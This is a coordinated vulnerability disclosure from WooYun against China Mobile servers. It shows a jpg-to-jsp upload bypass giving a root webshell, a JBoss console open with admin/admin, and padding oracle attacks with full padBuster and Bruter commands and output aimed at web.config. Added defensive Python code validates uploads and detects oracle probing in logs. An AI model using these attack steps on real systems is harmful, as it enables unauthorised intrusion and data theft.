
Vulnerability summary

Defect ID: wooyun-2016-0212792

Title: Carrier security: multiple China Mobile vulnerabilities bundled (shell and intranet roaming possible)

Vendor: China Mobile

Author: harbour_bin

Submitted: 2016-05-26 20:06

Fixed: 2016-07-14 09:50

Published: 2016-07-14 09:50

Vulnerability type: File upload leading to arbitrary code execution

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-05-26: Details sent to the vendor; awaiting vendor response
2016-05-30: Vendor confirmed; details disclosed to the vendor only
2016-06-09: Details disclosed to core white hats and relevant domain experts
2016-06-19: Details disclosed to regular white hats
2016-06-29: Details disclosed to intern white hats
2016-07-14: Details disclosed to the public

Brief description:

See title.

Detailed description:

#1 File upload vulnerability
##1.1 Proof that the host belongs to China Mobile: http://**.**.**.**/profile/create, then click register

1-1.png


##1.2 File upload: upload a jpg, intercept the request and change the extension to jsp, which bypasses the check

1-2.png


##1.3 Upload succeeded; shell obtained
http://**.**.**.**/data/images/2016/05/22/20160522105415_4611.jsp

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root


eth0      Link encap:Ethernet  HWaddr 00:50:56:8C:7D:53  
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::250:56ff:fe8c:7d53/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6135649371 errors:0 dropped:0 overruns:0 frame:0
TX packets:10647266306 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:952335725793 (886.9 GiB) TX bytes:13808412065401 (12.5 TiB)
eth1 Link encap:Ethernet HWaddr 00:50:56:8C:7D:54
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::250:56ff:fe8c:7d54/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:62586 errors:0 dropped:0 overruns:0 frame:0
TX packets:5868 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3901571 (3.7 MiB) TX bytes:251248 (245.3 KiB)
lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:362616740 errors:0 dropped:0 overruns:0 frame:0
TX packets:362616740 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:29881800131 (27.8 GiB) TX bytes:29881800131 (27.8 GiB)


? (**.**.**.**) at 00:00:5E:00:01:54 [ether] on eth0
? (**.**.**.**) at 02:1F:A0:00:00:21 [ether] on eth0
? (**.**.**.**) at 00:25:9E:F4:39:35 [ether] on eth1
? (**.**.**.**) at 00:25:9E:F4:39:35 [ether] on eth0
? (**.**.**.**) at 02:16:3E:55:39:49 [ether] on eth0
? (**.**.**.**) at 7E:2C:0D:04:85:15 [ether] on eth0
? (**.**.**.**) at 00:50:56:8C:7D:51 [ether] on eth0
? (**.**.**.**) at 00:1F:A0:04:D4:5C [ether] on eth0
? (**.**.**.**) at 00:1F:A0:04:D4:AC [ether] on eth0
? (**.**.**.**) at 00:50:56:8C:7D:55 [ether] on eth0
? (**.**.**.**) at 02:16:3E:50:0E:A1 [ether] on eth0


1-3.png
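The root cause in 1.2 is that the server trusted the client-supplied file extension and then served the stored file from a path where JSP executes. As an added example (this is not the report author's code and not the affected site's code), the following Python validator decides the stored extension from the file's magic bytes, rejects any mismatch with the claimed extension, and writes the file under a server-chosen random name; the allowed types, size limit, helper names and upload directory are all assumptions. Magic-byte sniffing on its own does not catch a real image with server-side code appended, so the directory the file lands in must also be one the servlet container never executes from.

```python
import os
import secrets

# Assumed policy: the image types this upload endpoint accepts, each tied to
# the magic bytes the content must start with. Everything else is rejected.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024  # assumed limit


class UploadRejected(ValueError):
    """Raised for any upload that fails validation; the caller answers HTTP 400."""


def sniff_image_type(data: bytes):
    """Return the allowed type whose magic bytes the content starts with, else None."""
    for ext, magics in ALLOWED_TYPES.items():
        if any(data.startswith(m) for m in magics):
            return ext
    return None


def validate_upload(client_filename: str, data: bytes) -> str:
    """Return the extension the file will be stored with, or raise UploadRejected.

    The client-supplied name is only used for an allowlist check; the decision
    is made on the bytes. Renaming photo.jpg to shell.jsp in an intercepted
    request (the bypass in 1.2) fails the allowlist, and JSP source sent under
    a .jpg name fails the content check.
    """
    if not data:
        raise UploadRejected("empty upload")
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("upload too large")

    # basename() drops any path components; the lowercased extension is
    # looked up in the allowlist and is never written to disk as supplied.
    claimed = os.path.splitext(os.path.basename(client_filename))[1].lstrip(".").lower()
    if claimed == "jpeg":
        claimed = "jpg"
    if claimed not in ALLOWED_TYPES:
        raise UploadRejected(f"extension not allowed: {claimed!r}")

    actual = sniff_image_type(data)
    if actual is None:
        raise UploadRejected("content is not a recognised image")
    if actual != claimed:
        raise UploadRejected(f"extension {claimed!r} does not match content {actual!r}")
    return actual


def is_rejected(client_filename: str, data: bytes) -> bool:
    """Convenience wrapper: True when validate_upload refuses the upload."""
    try:
        validate_upload(client_filename, data)
    except UploadRejected:
        return True
    return False


def stored_name(ext: str) -> str:
    """Server-chosen file name: nothing from the client reaches the path."""
    if ext not in ALLOWED_TYPES:
        raise ValueError("unexpected extension")
    return f"{secrets.token_hex(16)}.{ext}"


def save_upload(client_filename: str, data: bytes, upload_root: str) -> str:
    """Validate, then write under upload_root, which must be a directory the
    servlet container does not execute from (the vulnerable site stored
    uploads under a web-mapped /data/images/ path, so the renamed .jsp ran)."""
    ext = validate_upload(client_filename, data)
    name = stored_name(ext)
    with open(os.path.join(upload_root, name), "wb") as fh:
        fh.write(data)
    return name


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 32  # constructed JPEG header
    print(validate_upload("photo.jpg", jpeg))
    print(is_rejected("shell.jsp", jpeg), is_rejected("shell.jpg", b'<%@ page language="java" %>'))
```

The validator is deliberately strict in both directions: a mismatch between the claimed and sniffed type is rejected rather than silently corrected, because a client that lies about the type is the case this endpoint exists to stop.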


#2 Anonymous access to the server's admin console
##2.1 http://**.**.**.**:3380/

1-4.png


1-5.png


##2.2 Login with a weak password
http://**.**.**.**:3380/admin-console/login.seam?conversationId=96
admin\admin

1-6.png


##2.3 Proof of impact
**.**.**.**:3380/is/index.jsp 023

eth0      Link encap:Ethernet  HWaddr FA:16:3E:1E:6E:B8  
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::f816:3eff:fe1e:6eb8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4026126721 errors:0 dropped:0 overruns:0 frame:0
TX packets:4603968084 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1079154466212 (1005.0 GiB) TX bytes:1287649748420 (1.1 TiB)
lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:569904 errors:0 dropped:0 overruns:0 frame:0
TX packets:569904 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:41959898 (40.0 MiB) TX bytes:41959898 (40.0 MiB)


? (**.**.**.**) at fa:16:3e:24:51:c2 [ether] on eth0
? (**.**.**.**) at 00:00:5e:00:01:70 [ether] on eth0


1-7.png


#3 Two Padding Oracle Attacks
They are right there on the http://**.**.**.**/ page, so I won't write them up; the corresponding IP is **.**.**.**
##3.1 http://**.**.**.**:8001/

padBuster.pl http://**.**.**.**:8001/WebResource.axd?d=ZBdcbTkhb2X6pzycCd75eQ2 ZBdcbTkhb2X6pzycCd75eQ2 16 -encoding 3 -plaintext "|||~/web.config"


INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21725
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 3877 N/A
2 ** 255 500 5013 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (138/256) [Byte 16]
[+] Success: (138/256) [Byte 15]
[+] Success: (249/256) [Byte 14]
[+] Success: (170/256) [Byte 13]
[+] Success: (20/256) [Byte 12]
[+] Success: (184/256) [Byte 11]
[+] Success: (87/256) [Byte 10]
[+] Success: (114/256) [Byte 9]
[+] Success: (192/256) [Byte 8]
[+] Success: (38/256) [Byte 7]
[+] Success: (205/256) [Byte 6]
[+] Success: (166/256) [Byte 5]
[+] Success: (60/256) [Byte 4]
[+] Success: (78/256) [Byte 3]
[+] Success: (163/256) [Byte 2]
[+] Success: (168/256) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 342ec0b7794fb52ba8cd2187346d1376
[+] Intermediate Bytes (HEX): 4852bcc95638d04986ae4ee952047477
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: NC7At3lPtSuozSGHNG0TdgAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------


Bruter.pl http://**.**.**.**:8001/ScriptResource.axd NC7At3lPtSuozSGHNG0TdgAAAAAAAAAAAAAAAAAAAAA1 16


Total Requests:11117
Resulting Exploit Block:u2sJXBVvXn6B615ajjax9zQuwLd5T7UrqM0hhzRtE3YAAAAAAAAAAAAAAAAAAAAA0


http://**.**.**.**:8001/ScriptResource.axd?d=u2sJXBVvXn6B615ajjax9zQuwLd5T7UrqM0hhzRtE3YAAAAAAAAAAAAAAAAAAAAA0


1-8.png


##3.2 http://**.**.**.**:8003/

padBuster.pl http://**.**.**.**:8003/WebResource.axd?d=t6YDFzeBpU_Lvb8TVusVCg2 t6YDFzeBpU_Lvb8TVusVCg2 16 -encoding 3 -plaintext "|||~/web.config"


INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21725
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 3877 N/A
2 ** 255 500 5013 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (139/256) [Byte 16]
[+] Success: (195/256) [Byte 15]
[+] Success: (236/256) [Byte 14]
[+] Success: (119/256) [Byte 13]
[+] Success: (86/256) [Byte 12]
[+] Success: (10/256) [Byte 11]
[+] Success: (31/256) [Byte 10]
[+] Success: (248/256) [Byte 9]
[+] Success: (70/256) [Byte 8]
[+] Success: (213/256) [Byte 7]
[+] Success: (129/256) [Byte 6]
[+] Success: (1/256) [Byte 5]
[+] Success: (236/256) [Byte 4]
[+] Success: (91/256) [Byte 3]
[+] Success: (225/256) [Byte 2]
[+] Success: (112/256) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): fc6cd767dc0344d12e859fc1eb7e5875
[+] Intermediate Bytes (HEX): 8010ab19f37421b300e6f0af8d173f74
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: _GzXZ9wDRNEuhZ_B635YdQAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------


Bruter.pl http://**.**.**.**:8003/ScriptResource.axd _GzXZ9wDRNEuhZ_B635YdQAAAAAAAAAAAAAAAAAAAAA1 16


Total Requests:10684
Resulting Exploit Block:VdrNMIWsTTg3GATJ9Hom-_xs12fcA0TRLoWfwet-WHUAAAAAAAAAAAAAAAAAAAAA0


http://**.**.**.**:8003/ScriptResource.axd?d=VdrNMIWsTTg3GATJ9Hom-_xs12fcA0TRLoWfwet-WHUAAAAAAAAAAAAAAAAAAAAA0


1-9.png
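The PadBuster and Bruter output above shows what this attack looks like from the server's side: hundreds of requests to WebResource.axd or ScriptResource.axd per recovered byte, almost all of them answered with HTTP 500, and more than ten thousand requests for the Bruter run. Until the Microsoft patch from the remediation list is applied, that pattern is easy to spot in the web server logs. As an added example (not from the report and not a Microsoft tool), the Python script below parses IIS W3C log lines, which are constructed here, and flags any client that produces more than a threshold of 500 responses to an .axd handler within a ten-minute window; the field list, threshold, window and sample addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The two ASP.NET handlers the report targets with PadBuster and Bruter.
AXD_RE = re.compile(r"/(?:WebResource|ScriptResource)\.axd$", re.IGNORECASE)


def parse_w3c(lines):
    """Parse IIS W3C extended log lines, taking column names from the #Fields directive."""
    fields = None
    for line in lines:
        line = line.rstrip("\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log data has no #Fields directive")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # skip a malformed line rather than abort the whole run
        yield dict(zip(fields, values))


def detect_padding_oracle_probing(records, threshold=50, window=timedelta(minutes=10)):
    """Return one alert per client that drew >= threshold HTTP 500 answers
    from an .axd handler inside any sliding window of the given length."""
    by_client = defaultdict(list)
    for r in records:
        if not AXD_RE.search(r["cs-uri-stem"]) or r["sc-status"] != "500":
            continue
        ts = datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
        by_client[r["c-ip"]].append((ts, r["cs-uri-query"]))

    alerts = []
    for ip, events in by_client.items():
        events.sort()
        start, best = 0, 0
        for end in range(len(events)):  # two-pointer sliding window
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append({
                "c-ip": ip,
                "errors_in_window": best,
                # a padding oracle varies the ciphertext (d=...) on every request
                "distinct_d": len({q for _, q in events}),
            })
    return alerts


def constructed_sample():
    """Constructed IIS log: one probing client plus ordinary traffic (not real data)."""
    lines = ["#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status time-taken"]
    base = datetime(2016, 5, 22, 10, 54, 0)
    # 256 probes from one client, one per second, a different d= each time;
    # 255 of them answered 500, mirroring the Freq column in the PadBuster output.
    for i in range(256):
        ts = base + timedelta(seconds=i)
        status = "200" if i == 137 else "500"
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} 10.0.0.5 GET /WebResource.axd d=probe{i:03d}AAAA 8001 198.51.100.23 {status} 15")
    # Legitimate clients fetching one fixed resource successfully, plus a single stray 500.
    for i in range(40):
        ts = base + timedelta(seconds=3 * i)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} 10.0.0.5 GET /ScriptResource.axd d=legitAAAA 8001 203.0.113.{i % 4 + 1} 200 9")
    lines.append(f"{base:%Y-%m-%d %H:%M:%S} 10.0.0.5 GET /WebResource.axd d=brokenlink 8001 203.0.113.9 500 12")
    return lines


if __name__ == "__main__":
    for alert in detect_padding_oracle_probing(parse_w3c(constructed_sample())):
        print(alert)
```

The distinct_d count is what separates an oracle probe from a client repeatedly hitting one broken resource link: the former changes the ciphertext on nearly every request, the latter repeats the same value.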

Proof of vulnerability:

Proven above!

Remediation:

1. Padding Oracle vulnerability: install the official Microsoft patch;
2. File upload: redesign the upload handling and remove the webshell;
3. Reconfigure JBoss;
4. You know this better than I do.

Copyright notice: when reposting, please credit harbour_bin@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2016-05-30 09:43

Vendor reply:

CNVD confirmed and reproduced the described issue; it has been forwarded via CNCERT to China Mobile Group, which will coordinate handling with the website management department.

Latest status:

None yet